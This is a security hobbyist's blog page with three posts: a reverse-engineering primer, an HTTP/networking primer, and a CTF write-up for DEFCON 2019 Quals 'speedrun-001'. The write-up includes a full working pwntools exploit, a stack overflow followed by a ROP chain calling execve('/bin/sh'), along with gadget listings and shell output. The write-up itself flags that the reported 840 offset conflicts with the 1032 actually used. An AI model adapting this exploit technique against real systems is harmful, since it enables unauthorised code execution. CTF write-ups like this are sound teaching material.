
Monday, December 19, 2022

Beginner Reversing


Reversing is a fundamental skill that requires understanding various low-level concepts, both to uncover vulnerabilities and to reverse algorithms. While learning reversing, I've had to adapt my mindset to reading various patterns that help me when playing CTFs or doing my own independent security research. In this blog post, I will go over basic reverse engineering concepts and the methodology that goes into it.

Reverse engineering is basically the process of tearing down software or hardware and analyzing how it works so that its functionality and behaviour can be better understood. Before we even begin, it helps to look at the various methods that go into reverse engineering.

I'm not gonna go through the details of how a computer handles an executed program. That will be covered in detail in a future post or tutorial. Here I will reverse engineer a "hello world" program, compiled for x64, on my Linux machine.

Take a look at the code below:


This is a simple "hello_world" program written in C. It simply prints "Hello World!" on the command line using the puts() function. Looking at this program, it doesn't really do much. Let's start by compiling this code into a working executable that we can run on the command line as well as debug. This tutorial is written for a Linux system. You can apply the same reverse engineering knowledge on a Windows machine, but the compilation steps here are Linux-specific.

Copy this code and save it as "hello_world.c". After that, you can use "gcc", the GNU C compiler available on most Linux distributions, to compile C programs from the terminal. To compile your "hello_world.c" program, the command is as follows:

gcc hello_world.c -o hello_world

Now that you have compiled the program, it's time to look at its assembly code.


The code above is the assembly code of the hello_world program. Okay???? So what???? Well... with languages like C and C++, the code that we actually write is not what gets executed. The code we write is sent to a compiler, which translates it into machine code, and assembly is the human-readable form of that machine code. It is essentially the "real" code being run by the processor. It will serve you well to understand how assembly code really works so you can thrive and actually succeed in reversing.
Assembly is not a single language: each processor architecture has its own. The one you see above is x64 (also known as x86-64 or amd64). Others include x86 (32-bit), ARM and MIPS.

To begin reversing, we have to understand what Registers are:

Registers are small, fast storage locations inside the processor that hold the data it is currently working on. They're quite similar to variables.
Below is a list of some of the general-purpose registers available in x64.

rax
rbx
rcx
rdx
rsi
rdi
r8
r9

This blog post will end there for now. In a future post, I will expound more on the different x64 registers and how they can greatly impact your reverse engineering projects and hacks.

Happy Hacking.






Saturday, May 7, 2022

Buffer Overflow to ROP Chain | speedrun-001 | DEFCON 2019 Quals pwn CTF challenge




Back with another binary exploitation challenge. This time I decided to do a DEFCON 2019 CTF Qualifier challenge because, despite being in the infosec community, I've never done any CTF hosted or provided by DEFCON. For those who have no clue what DEFCON is, it is a conference where hackers and security researchers link up, host talks that pertain to security, and run different CTFs (both Jeopardy style and Attack-and-Defense). I'm not gonna dive into the history of DEFCON. To know more, click here.

Back to the challenge. This challenge involves exploiting a buffer overflow vulnerability and then crafting a ROP chain that executes '/bin/sh', which would get us a shell on the remote machine to read the flag. At the time of this writeup, the target server has been shut down, so there is no remote server to connect to. However, the binary has been provided, so we can take on the challenge locally and pop a shell.

Typically for these kinds of hacking challenges, there are times when you're provided with the source and times when you're not. So some knowledge of programming (in C) and some reverse engineering is vital. Let's get to the challenge.

Challenge binary can be downloaded here

Let's run checksec on the binary to have a look at the security mechanisms enabled on it.

kaizen@kaizen-box:~/oooverflow# checksec speedrun-001
[*] '/home/kaizen/oooverflow/speedrun-001'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

RELRO (Relocation Read-Only) is partially enabled, which won't matter in our case because we have no need to overwrite any entry in the Global Offset Table. There's no stack canary, which is good for us: if one were enabled, the program would notice the corrupted canary before returning and abort, so a plain stack overflow could not reach the saved return address unnoticed. Good stuff so far! NX is enabled, which immediately stands out to me, because it means we can't inject code onto the stack and have it executed. PIE (Position Independent Executable) is off as well, so the binary is loaded at a fixed address (0x400000), which is pretty good for us.

Upon executing the binary, we see that the program awaits input from the user. If the user takes too long, a timeout signal fires and the program exits. Since the program awaits input, let's send through a whole bunch of junk to see if we can trigger a 'segmentation fault' and find out whether the program is vulnerable to a buffer overflow.


kaizen@kaizen-box:~/oooverflow# python -c 'print ("A"*2000)' | ./speedrun-001 
Hello brave new challenger
Any last words?
This will be the last thing that you say: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)

We trigger a segmentation fault, indicating that we've overflowed a buffer. This tells us the program reads more input than its buffer can hold, which is the same class of bug you get from gets(). If you know anything about the buffer overflow vulnerability, a function like gets() keeps storing characters past the end of the allocated buffer, overwriting whatever sits next to it on the stack, including the saved return address. So let's open the binary in gdb and see how much input we need to control the saved return address, by generating a cyclic pattern of characters and using it to trigger another segmentation fault.

gef➤  r
Starting program: /home/kaizen/oooverflow/speedrun-001 
Hello brave new challenger
Any last words?
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaa...
This will be the last thing that you say: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaa...

[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x7fc             
$rbx   : 0x00000000400400  →   sub rsp, 0x8
$rcx   : 0x0               
$rdx   : 0x000000006bbd30  →   add BYTE PTR [rax], al
$rsp   : 0x007fffffffe4d8  →  "eaaaaaaffaaaaaafgaaaaaafhaaaaaafiaaaaaafjaaaaaafka[...]"
$rbp   : 0x6661616161616164 ("daaaaaaf"?)
$rsi   : 0x0               
$rdi   : 0x1               
$rip   : 0x00000000400bad  →   ret 
$r8    : 0x7fc             
$r9    : 0x7fc             
$r10   : 0xfffff82f        
$r11   : 0x246             
$r12   : 0x000000004019a0  →   push rbp
$r13   : 0x0               
$r14   : 0x000000006b9018  →  0x00000000440ea0  →   mov rcx, rsi
$r15   : 0x0               
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00 
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x007fffffffe4d8│+0x0000: "eaaaaaaffaaaaaafgaaaaaafhaaaaaafiaaaaaafjaaaaaafka[...]"	 ← $rsp
0x007fffffffe4e0│+0x0008: "faaaaaafgaaaaaafhaaaaaafiaaaaaafjaaaaaafkaaaaaafla[...]"
0x007fffffffe4e8│+0x0010: "gaaaaaafhaaaaaafiaaaaaafjaaaaaafkaaaaaaflaaaaaafma[...]"
0x007fffffffe4f0│+0x0018: "haaaaaafiaaaaaafjaaaaaafkaaaaaaflaaaaaafmaaaaaafna[...]"
0x007fffffffe4f8│+0x0020: "iaaaaaafjaaaaaafkaaaaaaflaaaaaafmaaaaaafnaaaaaafoa[...]"
0x007fffffffe500│+0x0028: "jaaaaaafkaaaaaaflaaaaaafmaaaaaafnaaaaaafoaaaaaafpa[...]"
0x007fffffffe508│+0x0030: "kaaaaaaflaaaaaafmaaaaaafnaaaaaafoaaaaaafpaaaaaafqa[...]"
0x007fffffffe510│+0x0038: "laaaaaafmaaaaaafnaaaaaafoaaaaaafpaaaaaafqaaaaaafra[...]"
────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x400ba6                  call   0x40f710
     0x400bab                  nop    
     0x400bac                  leave  
 →   0x400bad                  ret    
[!] Cannot disassemble from $PC
────────────────────────────────────────────────────────────────────────────────────────────────────────────────  threads ────
[#0] Id 1, Name: "speedrun-001", stopped 0x400bad in ?? (), reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] 0x400bad → ret 

gef➤  i f
Stack level 0, frame at 0x7fffffffe4d8:
 rip = 0x400bad; saved rip = 0x6661616161616165
 called by frame at 0x7fffffffe4e8
 Arglist at 0x7fffffffe4d0, args: 
 Locals at 0x7fffffffe4d0, Previous frame's sp is 0x7fffffffe4e0
 Saved registers:
  rip at 0x7fffffffe4d8

gef➤  pattern search "eaaaaaaf"
[+] Searching for 'eaaaaaaf'
[+] Found at offset 840 (little-endian search) likely

In gdb we trigger a seg fault again, but this time with our generated pattern. Because every 8-byte chunk of the pattern is unique, the chunk that lands in the saved return address tells us exactly how far that address is from the start of our input. Here the saved return address holds 0x6661616161616165, which is "eaaaaaaf" in little-endian, and the offset from the start of our input to the saved return address is 1032 bytes. Note that the gef transcript above reports 840; that line appears to come from a different pattern run, and 1032 is the value the exploit below uses. We'll take note of that.
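As a quick sanity check on the register values gdb printed, here is a small sketch using only Python's standard struct module (not gef or pwntools). It converts the saved rip and rbp values from the crash back into the pattern bytes they came from.

```python
import struct

# Value gdb reported as the saved rip after the crash (from the transcript above).
saved_rip = 0x6661616161616165

# x86-64 is little-endian, so the lowest byte of the number is the first byte in memory.
pattern_chunk = struct.pack("<Q", saved_rip)
print(pattern_chunk)  # b'eaaaaaaf'

# The same conversion applied to the clobbered rbp value.
rbp_chunk = struct.pack("<Q", 0x6661616161616164)
print(rbp_chunk)  # b'daaaaaaf'
```

The rbp chunk ("daaaaaaf") sits directly before the rip chunk ("eaaaaaaf") in the pattern, which is what we expect from a saved frame pointer followed by a saved return address.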

Now that we have control over the return address, we need a way forward. There are no other useful functions to jump to within the executable, so the next plan of action is to use ROP gadgets. I've explained ROP gadgets in the past and why they are used the way they are. With ROP we chain together small instruction sequences that already exist in the binary. Using ROP here seems like the only option, since NX is enabled and we can't execute shellcode on the stack. So let's do that.

The goal is to make an execve system call that executes /bin/sh. To do this, we need to find ROP gadgets within the executable that let us pop values into the registers the execve syscall uses (rax, rdi, rsi and rdx). For this, we can use either ROPgadget or ropper to browse through the executable and list the available gadgets. Since we are looking for gadgets that set up the arguments of the execve system call, we will 'grep' for 'pop rdx', 'pop rax', 'pop rdi' and 'pop rsi'.


$ ROPgadget --binary speedrun-001 | grep ": pop rdx ; ret" 
	0x00000000004498b5 : pop rdx ; ret
	0x000000000045fe71 : pop rdx ; retf
$ ROPgadget --binary speedrun-001 | grep ": pop rax ; ret" 
	0x0000000000415664 : pop rax ; ret
	0x000000000048cccb : pop rax ; ret 0x22
	0x00000000004a9323 : pop rax ; retf
$ ROPgadget --binary speedrun-001 | grep ": pop rdi ; ret" 
	0x0000000000400686 : pop rdi ; ret
$ ROPgadget --binary speedrun-001 | grep ": pop rsi ; ret" 
	0x00000000004101f3 : pop rsi ; ret
$ ROPgadget --binary speedrun-001 | grep syscall
	0x000000000040129c : syscall
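If you'd rather not eyeball the grep output, the listing can be turned into a lookup table. This is a minimal sketch, assuming the "address : instructions" line format shown above; parse_gadgets is a hypothetical helper name, not part of ROPgadget.

```python
def parse_gadgets(text):
    """Map each gadget's instruction string to its address."""
    gadgets = {}
    for line in text.splitlines():
        if " : " not in line:
            continue  # skip blank lines and anything that is not a gadget
        addr, instr = line.strip().split(" : ", 1)
        gadgets[instr.strip()] = int(addr, 16)
    return gadgets

# Gadget lines copied from the ROPgadget output above.
sample = """
0x00000000004498b5 : pop rdx ; ret
0x000000000045fe71 : pop rdx ; retf
0x0000000000415664 : pop rax ; ret
0x000000000048cccb : pop rax ; ret 0x22
0x0000000000400686 : pop rdi ; ret
0x00000000004101f3 : pop rsi ; ret
0x000000000040129c : syscall
"""

gadgets = parse_gadgets(sample)

# Exact-match lookups pick the plain "ret" variants, not "retf" or "ret 0x22".
for name in ("pop rax ; ret", "pop rdi ; ret", "pop rsi ; ret", "pop rdx ; ret", "syscall"):
    print(f"{name:<15} {gadgets[name]:#x}")
```

Looking gadgets up by their exact instruction string avoids accidentally picking a "retf" or "ret 0x22" variant, which would disturb the stack layout of the chain.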

In addition to these gadgets, we need to place the string /bin/sh\x00 somewhere in memory, which means we need both a writable address and a gadget that can write to it. Within the executable, there is a mov instruction that stores the value of rdx at the memory address held in the rax register. So we'll use that.


0x0000000000471bb4 : mov qword ptr [rax], rdx ; mov eax, esi ; jmp 0x471b97
0x00000000004114a4 : mov qword ptr [rax], rdx ; mov qword ptr [rax + 8], rdx ; jmp 0x410ff7
0x0000000000484ec0 : mov qword ptr [rax], rdx ; pop rbx ; ret

0x000000000048d251 : mov qword ptr [rax], rdx ; ret		// Found Gadget!

0x0000000000471e6b : mov qword ptr [rax], rdx ; xor eax, eax ; jmp 0x471e2f
0x0000000000471e2a : mov qword ptr [rax], rdx ; xor eax, eax ; ret
0x000000000048f939 : mov qword ptr [rbp + 0x10], rax ; jmp 0x48f86e
0x0000000000418ff8 : mov q

For the memory location, the address 0x6b6000 will work for us: since PIE is disabled, this writable segment is always mapped at the same address, so we know it without an infoleak, and there doesn't appear to be anything stored at that address:


gef➤  vmmap
Start              End                Offset             Perm Path
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kaizen/Downloads/speedrun-001
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kaizen/Downloads/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
0x00007ffff7ffa000 0x00007ffff7ffd000 0x0000000000000000 r-- [vvar]
0x00007ffff7ffd000 0x00007ffff7fff000 0x0000000000000000 r-x [vdso]
0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall]
gef➤  x/4g 0x00000000006b6000
0x6b6000:	0x0	0x0
0x6b6010:	0x0	0x0
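The same check can be written down in a few lines. This is only a sketch: the mappings list is copied by hand from the vmmap output above, and find_mapping is a hypothetical helper, not a gef feature.

```python
def find_mapping(mappings, addr):
    """Return the (start, end, perms) mapping containing addr, or None."""
    for start, end, perms in mappings:
        if start <= addr < end:
            return start, end, perms
    return None

# The binary's own mappings from the vmmap output above.
mappings = [
    (0x400000, 0x4B6000, "r-x"),  # code
    (0x6B6000, 0x6BC000, "rw-"),  # writable data
    (0x6BC000, 0x6E0000, "rw-"),  # [heap]
]

target = 0x6B6000
start, end, perms = find_mapping(mappings, target)
print(hex(start), hex(end), perms)
print("writable:", "w" in perms)
```

The address we picked is the very first byte of the writable data segment, so an 8-byte write there stays comfortably inside the mapping.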

Lastly, we need the actual syscall...


0x0000000000475453 : sub esp, 8 ; syscall
0x0000000000475452 : sub rsp, 8 ; syscall

0x000000000040129c : syscall		// syscall found!

0x00000000004498a6 : test eax, eax ; jne 0x4498c0 ; xor eax, eax ; syscall
0x0000000000449976 : test eax, eax ; jne 0x449990 ; mov eax, 1 ; syscall
0x0000000000449ab3 : test eax, eax ; jne 0x449b18 ; mov eax, 0x48 ; syscall

With all this, it's safe to say that we have everything we need to build out the entire ROP chain. The execve syscall expects three arguments (in addition to 0x3b being in the rax register to specify that we want an execve system call). In the rdi register, it expects a pointer to the filename to be executed, which is /bin/sh. In the rsi and rdx registers, it expects pointers to the argument array and the environment variables for the process (for our purposes we don't need to worry about them, so we can just set them to zero).
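To make the register setup concrete, here is a small sketch using Python's struct module. It shows that the string /bin/sh plus its null terminator fits in exactly one 8-byte register, and which value that register has to hold. The registers dictionary is just an illustration of the setup described above, not something the exploit itself needs.

```python
import struct

# "/bin/sh" plus the terminating null byte is exactly 8 bytes: one 64-bit register.
binsh = b"/bin/sh\x00"
assert len(binsh) == 8

# Interpreted as a little-endian 64-bit integer, this is the value rdx must hold
# so that the mov gadget writes the string into memory in the right byte order.
binsh_value = struct.unpack("<Q", binsh)[0]
print(hex(binsh_value))  # 0x68732f6e69622f

# Register state we want right before the syscall instruction.
registers = {
    "rax": 0x3B,      # syscall number for execve on x86-64 Linux
    "rdi": 0x6B6000,  # pointer to "/bin/sh\x00"
    "rsi": 0x0,       # argv = NULL
    "rdx": 0x0,       # envp = NULL
}
for name, value in registers.items():
    print(f"{name} = {value:#x}")
```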

Our ROP chain will have the following instructions:


pop rdx, 0x0068732f6e69622f
pop rax, 0x6b6000
mov qword ptr [rax], rdx ; ret

pop rax, 0x3b
pop rdi, 0x6b6000
pop rsi, 0x0
pop rdx, 0x0

syscall
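The chain above can also be laid out as raw bytes without any exploit framework. The sketch below uses only the standard struct module and the addresses found earlier; the names q, chain and payload are my own, and the 1032-byte filler is the offset we measured in gdb.

```python
import struct

def q(value):
    """Pack a 64-bit value the way it sits on the little-endian stack."""
    return struct.pack("<Q", value)

# Gadget addresses from the ROPgadget output above.
POP_RDX, POP_RAX = 0x4498B5, 0x415664
POP_RSI, POP_RDI = 0x4101F3, 0x400686
WRITE_GADGET = 0x48D251   # mov qword ptr [rax], rdx ; ret
SYSCALL = 0x40129C
SCRATCH = 0x6B6000        # writable address for "/bin/sh\x00"
OFFSET = 1032             # bytes from start of input to saved return address

chain = [
    POP_RDX, 0x0068732F6E69622F,  # rdx = "/bin/sh\x00"
    POP_RAX, SCRATCH,             # rax = where to write it
    WRITE_GADGET,                 # [rax] = rdx
    POP_RAX, 0x3B,                # rax = execve
    POP_RDI, SCRATCH,             # rdi = pointer to "/bin/sh"
    POP_RSI, 0,                   # rsi = NULL
    POP_RDX, 0,                   # rdx = NULL
    SYSCALL,
]

payload = b"0" * OFFSET + b"".join(q(entry) for entry in chain)
print(len(chain), hex(len(payload)))  # 14 0x478
```

Each pop gadget consumes the 8-byte value that follows it on the stack and then returns into the next entry, which is why addresses and values alternate in the list.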

After all the analysis we've done on the executable, we finally have all we need. In a nutshell, we will exploit a buffer overflow vulnerability and build a ROP chain that performs an execve syscall on /bin/sh. I've already written out the final exploit.

Final Exploit

#!/usr/bin/env python3
from pwn import *
context.log_level = "DEBUG"
target = process('./speedrun-001')
#gdb.attach(target, gdbscript = 'b *0x400bad')
# Establish the pop ROP Gadgets
popRdx = p64(0x4498b5)
popRax = p64(0x415664)
popRsi = p64(0x4101f3)
popRdi = p64(0x400686)
# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
writeGadget = p64(0x48d251)
# syscall
syscall = p64(0x40129c)
# payload from initial input to return address
payload = b"0"*1032
# Write '/bin/sh\x00' to '0x6b6000'
#pop rdx, 0x0068732f6e69622f
#pop rax, 0x6b6000
#mov qword ptr [rax], rdx ; ret
payload += popRdx
payload += p64(0x0068732f6e69622f)
payload += popRax
payload += p64(0x6b6000)
payload += writeGadget
# Setup args for syscall
# pop rax, 0x3b
payload += popRax
payload += p64(0x3b)
# pop rdi, 0x6b6000
payload += popRdi
payload += p64(0x6b6000)
# pop rsi, 0x0
# pop rdx, 0x0
payload += popRsi
payload += p64(0)
payload += popRdx
payload += p64(0)
# syscall
payload += syscall
# Send the payload
target.send(payload)
target.interactive()

Upon running the exploit...

kaizen@kaizen-box:~/oooverflow# ./exploit.py 
[+] Starting local process './speedrun-001' argv=[b'./speedrun-001'] : pid 3190
[DEBUG] Sent 0x478 bytes:
    00000000  30 30 30 30  30 30 30 30  30 30 30 30  30 30 30 30  │0000│0000│0000│0000│
    *
    00000400  30 30 30 30  30 30 30 30  b5 98 44 00  00 00 00 00  │0000│0000│··D·│····│
    00000410  2f 62 69 6e  2f 73 68 00  64 56 41 00  00 00 00 00  │/bin│/sh·│dVA·│····│
    00000420  00 60 6b 00  00 00 00 00  51 d2 48 00  00 00 00 00  │·`k·│····│Q·H·│····│
    00000430  64 56 41 00  00 00 00 00  3b 00 00 00  00 00 00 00  │dVA·│····│;···│····│
    00000440  86 06 40 00  00 00 00 00  00 60 6b 00  00 00 00 00  │··@·│····│·`k·│····│
    00000450  f3 01 41 00  00 00 00 00  00 00 00 00  00 00 00 00  │··A·│····│····│····│
    00000460  b5 98 44 00  00 00 00 00  00 00 00 00  00 00 00 00  │··D·│····│····│····│
    00000470  9c 12 40 00  00 00 00 00                            │··@·│····│
    00000478
[*] Switching to interactive mode
[DEBUG] Received 0x461 bytes:
    00000000  48 65 6c 6c  6f 20 62 72  61 76 65 20  6e 65 77 20  │Hell│o br│ave │new │
    00000010  63 68 61 6c  6c 65 6e 67  65 72 0a 41  6e 79 20 6c  │chal│leng│er·A│ny l│
    00000020  61 73 74 20  77 6f 72 64  73 3f 0a 54  68 69 73 20  │ast │word│s?·T│his │
    00000030  77 69 6c 6c  20 62 65 20  74 68 65 20  6c 61 73 74  │will│ be │the │last│
    00000040  20 74 68 69  6e 67 20 74  68 61 74 20  79 6f 75 20  │ thi│ng t│hat │you │
    00000050  73 61 79 3a  20 30 30 30  30 30 30 30  30 30 30 30  │say:│ 000│0000│0000│
    00000060  30 30 30 30  30 30 30 30  30 30 30 30  30 30 30 30  │0000│0000│0000│0000│
    *
    00000450  30 30 30 30  30 30 30 30  30 30 30 30  30 b5 98 44  │0000│0000│0000│0··D│
    00000460  0a                                                  │·│
    00000461
Hello brave new challenger
Any last words?
This will be the last thing that you say: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000\xb5\x98D
$ id
[DEBUG] Sent 0x3 bytes:
    b'id\n'
[DEBUG] Received 0xb9 bytes:
    b'uid=1000(kaizen) gid=1001(kaizen) groups=1001(kaizen),3(sys),90(network),96(scanner),98(power),982(rfkill),984(users),985(video),987(storage),990(optical),991(lp),996(audio),998(wheel)\n'
uid=1000(kaizen) gid=1001(kaizen) groups=1001(kaizen),3(sys),90(network),96(scanner),98(power),982(rfkill),984(users),985(video),987(storage),990(optical),991(lp),996(audio),998(wheel)
[*] Got EOF while reading in interactive
$  

And just like that... WE POP A SHELL!! Challenge Complete.

Thursday, May 5, 2022

HTTP Basics

Hacking is a skillset built upon other skillsets. It's a culmination of various fields of IT. In this post, I want to diverge from low-level vulnerability exploitation and cover one of the most important topics in IT: the basics of networking, HTTP and web servers. In the next set of blog posts we'll build on this to discover vulnerabilities within websites. The Internet has become the most efficient medium for retrieving information and resources the world has ever known, so here is a brief crash course on the basics of networking, specifically the workings of the Internet. Networking is at the core of the way the Internet works. Networks, in non-technical terms, are systems, devices and computers that are able to communicate and request information and data from each other. Within this transfer of data, there are certain rules that these networks follow, as well as different data transfer mediums... but that's another rabbit hole for another post.

Within networking there is a protocol that the web runs on top of, along with many other services. TCP, the Transmission Control Protocol, is a network communication standard that allows applications and devices to reliably transfer data over a network. TCP is the transport protocol that services such as HTTP, FTP, SMB and SSH are built on.

Whenever you access the internet, you almost always use a browser. This "browser" is simply software that lets the average user communicate over HTTP with servers all around the world and request the information and resources they want. The browser plays the role of the "client". Understanding the core functionality of the web will help you understand how web vulns are found and how you can find them too.

Every website you access online is hosted on a web server, also known as an HTTP server. A "server" is simply a computer system dedicated to providing a service, or a host of services for that matter. The web server handles requests from clients, runs server-side code, and stores the information and data, or "web pages", as files. It is usually managed by system administrators. To be more technical, HTTP (Hypertext Transfer Protocol) is the protocol in charge of transferring hypermedia documents. If you know one or two things about websites, you'll know that they are primarily written in HTML, CSS and JavaScript, but that's out of scope here.

HTTP, SMB, FTP and many other services are data transfer protocols that run on top of TCP/IP. Each service listens on a port, and port numbers go up to 65535. Every well-known service has a port assigned to it by default, but it can be configured to use another port if needed. HTTP uses port 80 by default (HTTPS uses 443), so when you access a plain-HTTP website, your browser connects to port 80 on the server. HTTP is a request-response protocol. This means that when you use your browser to search for something like "cat photos" on Google, you are sending a "request" to the "google.com" server. The "google.com" server then sends a "response" back to your web browser, which in this case will be the cat photos you weirdly requested lol.
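To show what a "request" actually looks like on the wire, here is a minimal sketch that builds the text of an HTTP/1.1 GET request by hand. The function name build_get_request is my own and nothing is sent over the network; a browser or curl would send something similar (with more headers) to port 80 of the server.

```python
def build_get_request(host, path="/"):
    """Build the raw bytes of a minimal HTTP/1.1 GET request."""
    lines = [
        f"GET {path} HTTP/1.1",  # request line: method, resource, protocol version
        f"Host: {host}",         # required in HTTP/1.1: which site we want
        "Connection: close",     # ask the server to close the connection afterwards
        "",                      # blank line marks the end of the headers
        "",
    ]
    return "\r\n".join(lines).encode("ascii")

request = build_get_request("kaizensec.blogspot.com")
print(request.decode("ascii"))
```

HTTP/1.1 is a plain-text protocol: every line ends with a carriage return and line feed, and an empty line tells the server the request headers are complete.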


kaizen@kaizen-box:~# curl -I http://kaizensec.blogspot.com
HTTP/1.1 301 Moved Permanently
Location: https://kaizensec.blogspot.com/
Content-Type: text/html; charset=UTF-8
Date: Thu, 05 May 2022 18:03:46 GMT
Expires: Thu, 05 May 2022 18:03:46 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Server: GSE
Transfer-Encoding: chunked
Accept-Ranges: none
Vary: Accept-Encoding


Under the hood of the HTTP requests sent to web servers for resource retrieval, there are "request headers" that tell the server more about the request, such as the HOST the request is meant for and the kinds of content the client will ACCEPT. The server sends back "response headers", like the ones in the curl output above: alongside the status line (301 Moved Permanently) there is the LOCATION to go to instead and the CONTENT-TYPE of the response, which is typically "text/html" for web pages, along with other additional headers.
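Here is a rough sketch of how the status line and headers in the curl output above can be pulled apart. The function name parse_response_head is hypothetical, and real HTTP parsing has more edge cases (repeated headers, for example) than this handles.

```python
def parse_response_head(raw):
    """Split a raw HTTP response head into (status code, reason, headers)."""
    lines = raw.strip().splitlines()
    _version, code, reason = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # a blank line ends the header section
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()  # header names are case-insensitive
    return int(code), reason, headers

# A few lines taken from the curl -I output above.
raw_head = """HTTP/1.1 301 Moved Permanently
Location: https://kaizensec.blogspot.com/
Content-Type: text/html; charset=UTF-8
Server: GSE
"""

status, reason, headers = parse_response_head(raw_head)
print(status, reason)
print(headers["location"])
print(headers["content-type"])
```

The 301 status together with the Location header is the server telling the client to repeat the request over HTTPS.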

Another component in the effective functioning of the web is DNS. Networks are made up of different devices connected to each other with the ability to transfer data. How does a device know where to send data? It uses IP addresses. IP addresses, specifically IPv4 addresses, are 32-bit numbers, usually written as four octets, that allow devices to be identified for the purpose of data transfer over a network.

                                      ##### Example Of An IP Address ##### 

                                              10 . 10 . 17 . 28 

I can be about 90% certain that you've seen these before. The remaining 10% is just in case you haven't. There is quite a bit more to IP addresses, such as subnetting and the different IP classes, but that will be for another, deeper post on networking.
